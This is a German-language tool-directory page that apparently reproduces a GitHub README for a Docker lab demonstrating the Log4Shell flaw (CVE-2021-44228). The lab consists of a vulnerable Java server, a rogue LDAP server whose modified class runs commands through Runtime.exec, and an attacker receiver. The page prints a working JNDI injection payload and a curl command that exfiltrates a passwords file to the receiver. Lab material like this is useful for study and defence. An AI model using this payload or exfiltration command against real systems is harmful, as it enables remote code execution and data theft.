Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-44228-docker-example — Docker-basierte Demonstration der Ausnutzung von CVE-2021-44228 (Log4Shell), bestehend aus einem verwundbaren Java-Server, einem schädlichen LDAP-Server und Datenexfiltration zu einem vom Angreifer kontrollierten Empfänger. | Kitploit
Tools/GitHubGitHub/dicanio/cve-2021-44228-docker-example
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationLernen & BildungLabs & Praxis
GitHubdicanio/cve-2021-44228-docker-example

CVE-2021-44228-docker-example

Docker-basierte Demonstration der Ausnutzung von CVE-2021-44228 (Log4Shell), bestehend aus einem verwundbaren Java-Server, einem schädlichen LDAP-Server und Datenexfiltration zu einem vom Angreifer kontrollierten Empfänger.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

CVE-2021-44228-Docker-Beispiel

Eine einfache Demonstration von CVE-2021-44228 zum Übertragen von Daten von einem anfälligen Server zu einem von einem Angreifer kontrollierten Webdienst. Alle beteiligten Komponenten werden über Docker ausgeführt.

Komponenten

vulnerable-server

Dies ist ein Standard-Java-Server, der als Opfer fungiert. Er läuft mit:

  • Java 8u111
  • Webanwendung (Spring Boot 2.6.1)
  • Log4J

Dieser Server ist mit dieser Konfiguration VULNERABLE.

Zusätzliche Informationen:

  • Der Endpunkt /logging (GET) protokolliert den User-Agent mittels Log4J
  • /foo/passwords.txt existiert (das Ziel des Angreifers)

Inhalt von passwords.txt:

root@kitploit:~
my secret

malicious-receiver

Dies ist ein Standard-Java-Server, der als Datensammler des Angreifers fungiert. Er läuft mit:

  • Java 17
  • Webanwendung (Spring Boot 2.6.1)

Zusätzliche Informationen:

  • Der Endpunkt receiver (POST) protokolliert den Anforderungstext

malicious-ldap

Dies ist ein LDAP-Server, der auf rogue-jndi basiert. Seine ExportJava-Klasse wurde so modifiziert, dass über das Flag -c übergebene Befehle ausgeführt werden.

root@kitploit:~
public ExportObject() {
    try {
        Runtime.getRuntime().exec(Config.command);
    } catch(Exception e) {
        e.printStackTrace();
    }
}

Wenn der anfällige Server anfragt, antwortet er mit einer Klasse, die beim Instanziieren den folgenden Befehl ausführt:

root@kitploit:~
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt

Dadurch wird der Inhalt von /foo/passwords.txt effektiv an den vorbereiteten Endpunkt des böswilligen Empfängers gesendet.

Verwendung

  1. Docker-Images durch Ausführen von:
    root@kitploit:~
    ./build.sh
    
  2. Starten Sie die Containerkomponenten durch Ausführen von:
    root@kitploit:~
    ./start.sh
    
  3. Lösen Sie die Schwachstelle durch Ausführen von:
    root@kitploit:~
    curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
    
  4. Überprüfen Sie die Protokollausgabe der böswilligen Empfängerkomponente durch Ausführen von:
    root@kitploit:~
    docker logs --timestamps docker_malicious-receiver_1
    
    Es sollte der Inhalt der Datei passwords.txt des Servers erscheinen.
  5. Stoppen Sie die Containerkomponenten durch Ausführen von:
    root@kitploit:~
    ./stop.sh
    
Tool herunterladen